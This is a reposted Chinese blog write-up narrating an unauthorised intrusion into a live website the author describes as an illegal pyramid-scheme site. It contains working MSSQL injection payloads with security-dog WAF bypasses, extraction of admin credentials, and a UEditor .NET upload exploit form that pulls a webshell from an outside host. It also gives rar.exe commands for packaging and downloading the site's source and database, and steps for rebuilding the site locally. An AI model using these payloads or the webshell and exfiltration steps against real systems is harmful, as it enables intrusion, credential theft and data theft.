您当前的位置:首页 > 电脑百科 > 安全防护 > 服务器/网站

记一次对某非法站点从SQL注入到整站打包与本地搭建全过程

时间:2020-03-01 13:21:31  来源:  作者:

记一次对某非法站点从SQL注入到整站打包与本地搭建全过程

 

 

一、前言

如题,由于是在已知有一处sql注入的情况下才接手进行的后续操作,因此前面信息搜集则一笔带过。

 

二、信息搜集

目标是个本地的传销站点其大致信息为IIS+ASP.NET+安全狗、腾讯云。

 

三.pass Sq

 

3.1 Fuzz

记一次对某非法站点从SQL注入到整站打包与本地搭建全过程

 

根据如上测试可以看出程序本身也有过滤,error为程序自身的过滤。可以利用IIS处理%符号的机制绕过部分符号,例如空格使用%0b 加号使用%2b等。再根据测试的结果,可以先利用convert转换报错获取一部分信息。


 
记一次对某非法站点从SQL注入到整站打包与本地搭建全过程

 

goodscontent.aspx?gid=convert(int,@@version)#版本信息goodscontent.aspx?gid=convert(int,db_name())#数据库信息goodscontent.aspx?gid=convert(int,user_name())#当前数据库用户……tips:可以通过遍历db_name(1)中的数字获取其他库名
goodscontent.aspx?gid=convert(int,@@version)#版本信息goodscontent.aspx?gid=convert(int,db_name())#数据库信息goodscontent.aspx?gid=convert(int,user_name())#当前数据库用户……tips:可以通过遍历db_name(1)中的数字获取其他库名

得到以

ASP.NET 版本:Microsoft .NET Framework 版本:4.0.30319; ASP.NET 版本:4.0.30319.36400数据库版本:Microsoft SQL Server 2008 (RTM) - 10.0.1600.22 (X64)用户名:sa计算机名:10_*_76_*SQLEXPRESS   10.*.76.*当前库:pan20170823所有库名:pan20170823mastertempdbmodelmsdbReportServer$SQLEXPRESSReportServer$SQLEXPRESSTempDB

再往下就是获取表的信息

1.goodscontent.aspx?gid=CONVERT(INT,(CHAR(58)%2bCHAR(58)%2b(SELECT%0btop%0b1%0bCAST(COUNT(*)%0bAS%0bnvarchar(4000))%0bFROM%0binformation_schema.TABLES%0b)%2bCHAR(58)%2bCHAR(58)))#获取表总个数
记一次对某非法站点从SQL注入到整站打包与本地搭建全过程

 

由于我只会简单的select from因此始终无法获取表名,如果有其他姿势还望给科普下。

记一次对某非法站点从SQL注入到整站打包与本地搭建全过程

 

3.2 万金油

此时陷入僵局,后来想起在404大佬的一篇bypass安全狗的文章中提到过在mssql中注释加换行同样成立,遂构造之。

goodscontent.aspx?gid=--/*%0a(select%0btop%0b1%0btable_name%0bFROM%0binformation_schema.tables%0b)--%20*/PS:由于注入点已经使用了convert做了数据转换,后续直接防入查询即可
获取到第一个表名:jsrecord

 

记一次对某非法站点从SQL注入到整站打包与本地搭建全过程

 

由于还是没能绕过单引号和等号,我始终用不了not in与for xml path来爆后续的表名,这又触及到了我知识盲区,因此只好查阅大量文章案例,最终构造出如下语句。

/goodscontent.aspx?gid=--/*%0a(SELECT%0bTOP%0b1%0btable_name%0bFROM%0binformation_schema.tables%0bWHERE%0btable_name%0bNOT%0bIN(SELECT%0bTOP%0b11%0btable_name%0bFROM%0binformation_schema.columns))--%20*/
记一次对某非法站点从SQL注入到整站打包与本地搭建全过程

 

此时只需要遍历top的数值即可,例如:

 

/goodscontent.aspx?gid=--/*%0a(SELECT%0bTOP%0b1%0btable_name%0bFROM%0binformation_schema.tables%0bWHERE%0btable_name%0bNOT%0bIN(SELECT%0bTOP%0b80%0btable_name%0bFROM%0binformation_schema.columns))--%20*/
记一次对某非法站点从SQL注入到整站打包与本地搭建全过程

 

通过不断的遍历数值发现还是存在问题

举个例子,即 1-20、200-209,334-345返回同一个表名,存在大量重复与无序的情况,但可以通过burp中intruder->Grep-Extact功能来解决

 

操作如下:首先设置好intruder对001-600进行遍历(超过600多后就没什么内容了)

记一次对某非法站点从SQL注入到整站打包与本地搭建全过程

 


记一次对某非法站点从SQL注入到整站打包与本地搭建全过程

 

然后使用Grep-Extact提取表名。

记一次对某非法站点从SQL注入到整站打包与本地搭建全过程

 


记一次对某非法站点从SQL注入到整站打包与本地搭建全过程

 


记一次对某非法站点从SQL注入到整站打包与本地搭建全过程

 

保存结果后去重即可。

 

记一次对某非法站点从SQL注入到整站打包与本地搭建全过程

 

和前面获取到的表总个数是一致的。

解下来就是获取memberadmin表中的列名与内容,但在此之前我还是习惯性的看了下后台的网页源代码。

记一次对某非法站点从SQL注入到整站打包与本地搭建全过程

 

 

如图,盲猜列名txt_nickname、nickname、txt_password、password

 

/goodscontent.aspx?gid=--/*%0a(select%0btop%0b1%0bnickname%0bfrom%0bmemberadmin)--%20*/

 

记一次对某非法站点从SQL注入到整站打包与本地搭建全过程

 

 

/goodscontent.aspx?gid=--/*%0a(select%0btop%0b1%0bpassword%0bfrom%0bmemberadmin)--%20*/

 

四.后台getshell

 

登陆后台

 

记一次对某非法站点从SQL注入到整站打包与本地搭建全过程

 

经测试后发现信息管理处可以发布咨询,上传图片。通过修改去掉filename=”1.aspx”中的双引号绕过安全狗,但无法绕过程序自身的检测。

 

<form action="http://***/***/net/controller.ashx?action=catchimage"enctype="Application/x-www-form-urlencoded" method="POST"><p>shell addr:<input type="text" name="source[]" /></p ><input type="submit" value="Submit" /></form>

不过得知上传组件为ueditor,且.net版本存在上传漏洞

poc如下

 

<form action="http://***/***/net/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded" method="POST"><p>shell addr:<input type="text" name="source[]" /></p ><input type="submit" value="Submit" /></form>

并在自己的服务器上准备好shell(注意过狗),名称为a.gif,然后填入shell地址

 

https://o0o0.club/a.gif?.aspx

 

记一次对某非法站点从SQL注入到整站打包与本地搭建全过程

 

 

提交后即可得到shell路径

 

五、打包源码与数据库

 

在有了shell之后要做的事情就更明确了,即是打包源码与数据库,由于只需要这两样操作,相对于不需要太大的权限,避免操作不当触发警告。因此我选择先通过shell来进行打包操作。

记一次对某非法站点从SQL注入到整站打包与本地搭建全过程

 

 

记一次对某非法站点从SQL注入到整站打包与本地搭建全过程

 

源码

这里利用的是自行上传的rar.exe来分卷打包源码,在此之前尝试过7z.exe(目标服务器上已安装)、makecab 但效果并不理想,姿势不够还望科普。

1234567
rar.exe a -r -v50m -m5 pan20170823 *.*#a 压缩#-r 打包子目录#-v 分卷大小#-m 压缩等级#pan20170823目标目录#*.* 打包后文件名为 pan20170823.part*.rar

最终以每秒100k的速度下载完成。

记一次对某非法站点从SQL注入到整站打包与本地搭建全过程

 

数据库

略过,后台自带备份功能

坑点:后台的备份文件后缀为zip,下载回来总是提示文件损坏,一直以为备份功能有问题,后来发现文件头是TAPE。。。。

 

六、本地搭建

 

本地搭建的环境为 windows server 2012+IIS8+SQL Server 2008,简单讲讲0.0

 

SQL Server

安装过程略过导入数据

新建数据库,然后通过原设备还原数据

 

记一次对某非法站点从SQL注入到整站打包与本地搭建全过程

 

 

记一次对某非法站点从SQL注入到整站打包与本地搭建全过程

 

 

还原成功

记一次对某非法站点从SQL注入到整站打包与本地搭建全过程

 

 

IIS与ASP.NET

安装一笔带过,左边拉满就行,简单粗暴

记一次对某非法站点从SQL注入到整站打包与本地搭建全过程

 


记一次对某非法站点从SQL注入到整站打包与本地搭建全过程

 

添加站点

记一次对某非法站点从SQL注入到整站打包与本地搭建全过程

 

最好对应目标版本

记一次对某非法站点从SQL注入到整站打包与本地搭建全过程

 

修改源码中的配置文件

记一次对某非法站点从SQL注入到整站打包与本地搭建全过程

 

访问即可

记一次对某非法站点从SQL注入到整站打包与本地搭建全过程

 

作者:HACK_Learn

转载自:https://www.secpulse.com/archives/121093.html



Tags:SQL注入   点击:()  评论:()
声明:本站部分内容及图片来自互联网,转载是出于传递更多信息之目的,内容观点仅代表作者本人,如有任何标注错误或版权侵犯请与我们联系(Email:2595517585@qq.com),我们将及时更正、删除,谢谢。
▌相关推荐
前言目标是一大学,在一次挖洞过程中遇到个sql注入,尝试进一步利用扩大危害,漏洞已报送平台进行了修复私信我获取网络安全学习资料 1.2000多本网络安全系列电子书 2.网络安全标...【详细内容】
2021-11-26  Tags: SQL注入  点击:(21)  评论:(0)  加入收藏
本人也是小白一枚,大佬请绕过,这个其实是六月份的时候做的,那时候想多点实战经验,就直接用谷歌搜索找了一些网站,这个是其中一个1、目标网站 2、发现有WAF防护 3、判断存在注入...【详细内容】
2021-10-19  Tags: SQL注入  点击:(52)  评论:(0)  加入收藏
(一)SQL注入。1.如何理解SQL注入? SQL注入是一种将SQL代码添加到输入参数中,传递到SQL服务器解析并执行的一种攻击手法。2.SQL注入是如何产生的? web开发人员无法保证所有的输入...【详细内容】
2021-09-17  Tags: SQL注入  点击:(47)  评论:(0)  加入收藏
一 前言本文将针对开发过程中依旧经常出现的SQL编码缺陷,讲解其背后原理及形成原因。并以几个常见漏洞存在形式,提醒技术同学注意相关问题。最后会根据原理,提供解决或缓解方案...【详细内容】
2021-09-17  Tags: SQL注入  点击:(67)  评论:(0)  加入收藏
前言本人ctf选手一名,在最近做练习时遇到了一些sql注入的题目,但是sql注入一直是我的弱项之一,所以写一篇总结记录一下最近学到的一些sql注入漏洞的利用。可回显注入联合注入在...【详细内容】
2021-08-26  Tags: SQL注入  点击:(60)  评论:(0)  加入收藏
前言最近挖edusrc的时候遇到有注入点但是有waf绕不过,头疼。 可以看到还是phpstudy建站的,太熟悉了这个,不知道这个什么waf各位师傅知道的可以评论一下,所以写这篇文章是供各位...【详细内容】
2021-08-13  Tags: SQL注入  点击:(66)  评论:(0)  加入收藏
1. 使用 Burpsuite: 1. Capture the request using burpsuite. 2. Send the request to burp scanner. 3. Proceed with active scan. 4. Once the scan is finished, l...【详细内容】
2021-08-04  Tags: SQL注入  点击:(74)  评论:(0)  加入收藏
0&times;00:前言对于MYSQL知识的一个初总结 0&times;01:正文 MYSQL数据库特性1.Mysql数据库默认不区分大小写,利用此特性可以进行大小写过正则匹配,举个简单的例子,有的题目中只...【详细内容】
2021-07-29  Tags: SQL注入  点击:(88)  评论:(0)  加入收藏
在本地搭建服务器,httpd-vhosts.conf 中设置本地绑定的域名: 其中,zzzphp为下载的zzzphp cms的内容。然后,本机上的zzzphp cms的目录结构为如下: 在按照要求安装好cms后,本地cms的...【详细内容】
2021-07-16  Tags: SQL注入  点击:(80)  评论:(0)  加入收藏
得到一个像原来老师一样督促你、关心你的人很难。。。---- 网易云热评一、常用命令及函数1、order by排序,获取数据有几个字段,后面小于等于字段数,都会返回结果,大于字段数返回...【详细内容】
2021-05-13  Tags: SQL注入  点击:(224)  评论:(0)  加入收藏
▌简易百科推荐
在最近的一波攻击中,黑客利用多个插件中未修补的漏洞攻击了 160 万个 WordPress 网站。 易受攻击的插件对 WordPress 网站产生了的巨大攻击数据。 Wordfence 最近发现 WordPr...【详细内容】
2021-12-16  蚁安    Tags:WordPress   点击:(9)  评论:(0)  加入收藏
事件起因从安全分析系统里面发现一条带有病毒的下载,然后针对这条记录展开了一系列的分析分析过程1.登录到被感染服务器,查看系统状况,hadoop 这个用户在 2020/6/18 20:32 从这...【详细内容】
2021-11-23  Z2990Lig    Tags:SSH   点击:(32)  评论:(0)  加入收藏
1、除了服务器需要用的一些正规软件,其它都不要安装。2、在用户中把administrator改名,这样做的目的是即使对方暴破了我们的密码用户名也不容易猜住,相当于又加了一道关卡。...【详细内容】
2021-11-01  IT小哥吧    Tags:服务器   点击:(37)  评论:(0)  加入收藏
账户安全(1)更名administrator本地用户并禁用guest账户步骤:点击“开始”,找到“管理工具”,点击里面的“计算机管理”,找到“本地用户和组” (2)设定账户锁定策略尝试5次失败...【详细内容】
2021-10-12  Kali与编程  今日头条  Tags:Windows主机   点击:(62)  评论:(0)  加入收藏
本文主要介绍以Microsoft的Windows Server 2019 ,版本:Datacenter(Domain Controller)安全加固保护.企业随着规模不断扩大,业务增多,信息安全建设是企业里一条只有重点没有终点...【详细内容】
2021-09-17  Vireshark    Tags:服务器安全   点击:(64)  评论:(0)  加入收藏
目录常见共享命令IPC$IPC$的利用条件1:开启了139、445端口2:目标主机开启了IPC$共享3:IPC连接报错IPC空连接空连接可以做什么?(毫无作用)IPC$非空连接IPC$非空连接可以做什么?di...【详细内容】
2021-09-16  网络说安全    Tags:系统安全   点击:(86)  评论:(0)  加入收藏
昨天一个老哥找到我,说他的服务器这几天一直被CC攻击,问我这边有没有什么解决的方法? 近年来,网络攻击事件越来越频繁,最常见的就是CC攻击和DDOS攻击,主要的区别就是针对的对象不...【详细内容】
2021-09-10  小蚁GDRAGON    Tags:cc攻击   点击:(58)  评论:(0)  加入收藏
网站页面上的登录操作,通常都是输入帐号密码,传输至网站后台验证。在网站页面、数据传输中,通过技术手段,都可以得到用户输入的信息,并可以修改,从而发起网络攻击。典型的如:使用自...【详细内容】
2021-08-30  修丹道的程序猿    Tags:登录方式   点击:(62)  评论:(0)  加入收藏
网络安全研究人员披露了一类影响主要 DNS 即服务 (DNSaaS) 提供商的新漏洞,这些漏洞可能允许攻击者从企业网络中窃取敏感信息。基础设施安全公司 Wiz 的研究人员 Shir Tamar...【详细内容】
2021-08-12  零日时代    Tags:漏洞   点击:(66)  评论:(0)  加入收藏
001暴力破解1. 指定用户名爆破密码传统型爆破思路,用户名可以通过猜测或者信息收集获得。猜测:admin、网站域名等信息收集:新闻发布人、whoami等2. 指定密码爆破用户名如果是后...【详细内容】
2021-07-23  KaliMa  今日头条  Tags:登陆框   点击:(85)  评论:(0)  加入收藏
最新更新
栏目热门
栏目头条